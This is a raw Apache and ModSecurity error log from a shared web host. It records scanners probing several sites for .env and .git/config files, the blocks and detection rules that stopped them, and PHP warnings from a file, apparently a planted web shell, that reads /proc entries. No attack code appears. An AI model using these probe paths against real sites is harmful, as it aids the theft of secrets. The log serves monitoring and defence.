[Tue May 12 02:08:09.046477 2026] [security2:error] [pid 1730175:tid 1730188] [client 93.123.109.164:54010] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJvZ3o6NvB9WXx5V-5ybQAAAQs"]
[Tue May 12 02:08:09.932802 2026] [security2:error] [pid 1707624:tid 1707692] [client 93.123.109.164:15896] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.labaujue.com"] [uri "/api/.env"] [unique_id "agJvabOxS7i6i_mT2NK_SwAAAEo"], referer: https://labaujue.com/api/.env
[Tue May 12 02:08:09.932995 2026] [security2:error] [pid 1707624:tid 1707692] [client 93.123.109.164:15896] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.labaujue.com"] [uri "/api/.env"] [unique_id "agJvabOxS7i6i_mT2NK_SwAAAEo"], referer: https://labaujue.com/api/.env
[Tue May 12 02:08:11.023183 2026] [security2:error] [pid 1707624:tid 1707692] [client 93.123.109.164:15896] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.labaujue.com"] [uri "/index.php"] [unique_id "agJvabOxS7i6i_mT2NK_SwAAAEo"], referer: https://labaujue.com/api/.env
[Tue May 12 02:08:12.183336 2026] [security2:error] [pid 1691274:tid 1691280] [client 93.123.109.164:15912] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/api/.env"] [unique_id "agJvbFfdQaraX_prmqcWbwAAAAM"]
[Tue May 12 02:08:12.183800 2026] [security2:error] [pid 1691274:tid 1691280] [client 93.123.109.164:15912] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/api/.env"] [unique_id "agJvbFfdQaraX_prmqcWbwAAAAM"]
[Tue May 12 02:08:13.257346 2026] [security2:error] [pid 1691274:tid 1691280] [client 93.123.109.164:15912] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "labaujue.com"] [uri "/index.php"] [unique_id "agJvbFfdQaraX_prmqcWbwAAAAM"]
[Tue May 12 02:08:14.034339 2026] [security2:error] [pid 1730175:tid 1730199] [client 93.123.109.164:15928] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.labaujue.com"] [uri "/api/.env"] [unique_id "agJvbno6NvB9WXx5V-5yeQAAARY"], referer: https://labaujue.com/api/.env
[Tue May 12 02:08:14.035063 2026] [security2:error] [pid 1730175:tid 1730199] [client 93.123.109.164:15928] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.labaujue.com"] [uri "/api/.env"] [unique_id "agJvbno6NvB9WXx5V-5yeQAAARY"], referer: https://labaujue.com/api/.env
[Tue May 12 02:08:15.154044 2026] [security2:error] [pid 1730175:tid 1730199] [client 93.123.109.164:15928] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.labaujue.com"] [uri "/index.php"] [unique_id "agJvbno6NvB9WXx5V-5yeQAAARY"], referer: https://labaujue.com/api/.env
[Tue May 12 02:08:48.238232 2026] [security2:error] [pid 1695975:tid 1695985] [client 43.166.240.231:35796] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/le-trone-de-bieres/"] [unique_id "agJvkNVI9ymHBxup74-E4AAAAIc"]
[Tue May 12 02:09:24.156122 2026] [proxy_fcgi:error] [pid 1730207:tid 1730227] [client 185.16.36.161:46392] AH01071: Got error 'Primary script unknown'
[Tue May 12 02:09:24.695643 2026] [proxy_fcgi:error] [pid 1695975:tid 1695987] [client 78.142.18.172:35124] AH01071: Got error 'Primary script unknown'
[Tue May 12 02:09:35.720919 2026] [security2:error] [pid 1730207:tid 1730223] [client 43.128.69.143:59478] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.apoe.fr"] [uri "/"] [unique_id "agJvvzue9Sp-pIv_Bb6G1AAAAU4"], referer: http://www.apoe.fr
[Tue May 12 02:09:45.949196 2026] [ssl:error] [pid 1695975:tid 1695989] (EAI 2)Name or service not known: [client 43.166.244.251:59402] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 02:09:45.949261 2026] [ssl:error] [pid 1695975:tid 1695989] AH01941: stapling_renew_response: responder error
[Tue May 12 02:09:46.106700 2026] [security2:error] [pid 1695975:tid 1695989] [client 43.166.244.251:59402] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "happy-baby-box.fr"] [uri "/"] [unique_id "agJvytVI9ymHBxup74-FAQAAAIs"], referer: http://happy-baby-box.fr
[Tue May 12 02:09:48.499922 2026] [ssl:error] [pid 1691274:tid 1691297] (EAI 2)Name or service not known: [client 43.166.244.251:34126] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 02:09:48.499972 2026] [ssl:error] [pid 1691274:tid 1691297] AH01941: stapling_renew_response: responder error
[Tue May 12 02:09:49.163008 2026] [security2:error] [pid 1691274:tid 1691297] [client 43.166.244.251:34126] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "happy-baby-box.fr"] [uri "/cgi-sys/suspendedpage.cgi"] [unique_id "agJvzVfdQaraX_prmqcWqAAAABY"], referer: https://happy-baby-box.fr/
PHP Warning:  filesize(): stat failed for /proc/111/task/111/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/111/task/111/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/111/task/111/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/111/task/111/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/111/task/111/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/111/task/111/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 02:10:03.689793 2026] [security2:error] [pid 1730207:tid 1730229] [client 35.195.254.138:34766] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "piregwan-genesis.com"] [uri "/.git/config"] [unique_id "agJv2zue9Sp-pIv_Bb6G5QAAAVQ"]
[Tue May 12 02:10:03.690033 2026] [security2:error] [pid 1730207:tid 1730229] [client 35.195.254.138:34766] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "piregwan-genesis.com"] [uri "/.git/config"] [unique_id "agJv2zue9Sp-pIv_Bb6G5QAAAVQ"]
[Tue May 12 02:10:03.690264 2026] [security2:error] [pid 1730207:tid 1730229] [client 35.195.254.138:34766] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "piregwan-genesis.com"] [uri "/.git/config"] [unique_id "agJv2zue9Sp-pIv_Bb6G5QAAAVQ"]
[Tue May 12 02:10:16.793562 2026] [security2:error] [pid 1730175:tid 1730191] [client 170.106.163.48:55078] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "agJv6Ho6NvB9WXx5V-5y0QAAAQ4"]
[Tue May 12 02:10:51.616092 2026] [security2:error] [pid 1695975:tid 1696001] [client 170.106.72.93:56002] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/"] [unique_id "agJwC9VI9ymHBxup74-FMQAAAJc"]
[Tue May 12 02:10:55.616669 2026] [security2:error] [pid 1707624:tid 1707685] [client 176.65.139.232:47980] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "phonebook.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agJwD7OxS7i6i_mT2NLANAAAAEM"]
[Tue May 12 02:10:55.616904 2026] [security2:error] [pid 1707624:tid 1707685] [client 176.65.139.232:47980] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "phonebook.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agJwD7OxS7i6i_mT2NLANAAAAEM"]
[Tue May 12 02:10:55.617143 2026] [security2:error] [pid 1707624:tid 1707685] [client 176.65.139.232:47980] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "phonebook.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agJwD7OxS7i6i_mT2NLANAAAAEM"]
[Tue May 12 02:10:59.517259 2026] [ssl:error] [pid 1707624:tid 1707692] (EAI 2)Name or service not known: [client 108.130.81.255:54500] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 02:10:59.517321 2026] [ssl:error] [pid 1707624:tid 1707692] AH01941: stapling_renew_response: responder error
[Tue May 12 02:11:10.455820 2026] [autoindex:error] [pid 1730207:tid 1730210] [client 20.151.0.198:35799] AH01276: Cannot serve directory /home/letamsga/public_html/.well-known/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 02:11:10.488122 2026] [security2:error] [pid 1695975:tid 1695999] [client 43.156.51.128:37428] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJwHtVI9ymHBxup74-FNwAAAJU"]
[Tue May 12 02:11:43.070894 2026] [security2:error] [pid 1707624:tid 1707694] [client 43.140.247.223:44230] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "krakoukas.com"] [uri "/"] [unique_id "agJwP7OxS7i6i_mT2NLAXwAAAEw"], referer: http://krakoukas.com
[Tue May 12 02:11:45.102875 2026] [authz_core:error] [pid 1691274:tid 1691277] [client 17.246.15.204:49848] AH01630: client denied by server configuration: /home/jeanboya/public_html/wp-includes/Requests/library/error_log
[Tue May 12 02:11:48.637035 2026] [autoindex:error] [pid 1709071:tid 1709109] [client 20.151.0.198:35812] AH01276: Cannot serve directory /home/letamsga/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 02:11:58.718447 2026] [security2:error] [pid 1730207:tid 1730233] [client 43.166.239.145:36828] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/camping-port-grimaud/la-restauration/"] [unique_id "agJwTjue9Sp-pIv_Bb6HhQAAAVg"]
PHP Warning:  filesize(): stat failed for /proc/199/task/199/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/199/task/199/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/199/task/199/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/199/task/199/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/199/task/199/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/199/task/199/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 02:12:05.469484 2026] [security2:error] [pid 1695975:tid 1695981] [client 43.132.214.228:57780] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/wp-content/uploads/2021/09/Exulte-extrait-2.mp3"] [unique_id "agJwVdVI9ymHBxup74-FWAAAAIM"]
[Tue May 12 02:12:20.553671 2026] [autoindex:error] [pid 1709071:tid 1709109] [client 20.151.0.198:35812] AH01276: Cannot serve directory /home/letamsga/public_html/.well-known/acme-challenge/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 02:12:39.773244 2026] [autoindex:error] [pid 1730207:tid 1730224] [client 20.151.0.198:35783] AH01276: Cannot serve directory /home/letamsga/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 02:12:49.278395 2026] [autoindex:error] [pid 1707624:tid 1707696] [client 20.151.0.198:35724] AH01276: Cannot serve directory /home/letamsga/public_html/wp-includes/assets/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 02:12:58.806806 2026] [autoindex:error] [pid 1707624:tid 1707696] [client 20.151.0.198:35724] AH01276: Cannot serve directory /home/letamsga/public_html/wp-includes/fonts/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 02:13:34.352934 2026] [autoindex:error] [pid 1707624:tid 1707703] [client 20.151.0.198:35803] AH01276: Cannot serve directory /home/letamsga/public_html/wp-includes/js/codemirror/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 02:13:39.892900 2026] [autoindex:error] [pid 1707624:tid 1707684] [client 20.151.0.198:35779] AH01276: Cannot serve directory /home/letamsga/public_html/wp-includes/block-patterns/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1704927/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1704927/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1704927/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1704927/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1704927/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1704927/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/336/task/336/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/336/task/336/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/336/task/336/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/336/task/336/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/336/task/336/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/336/task/336/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
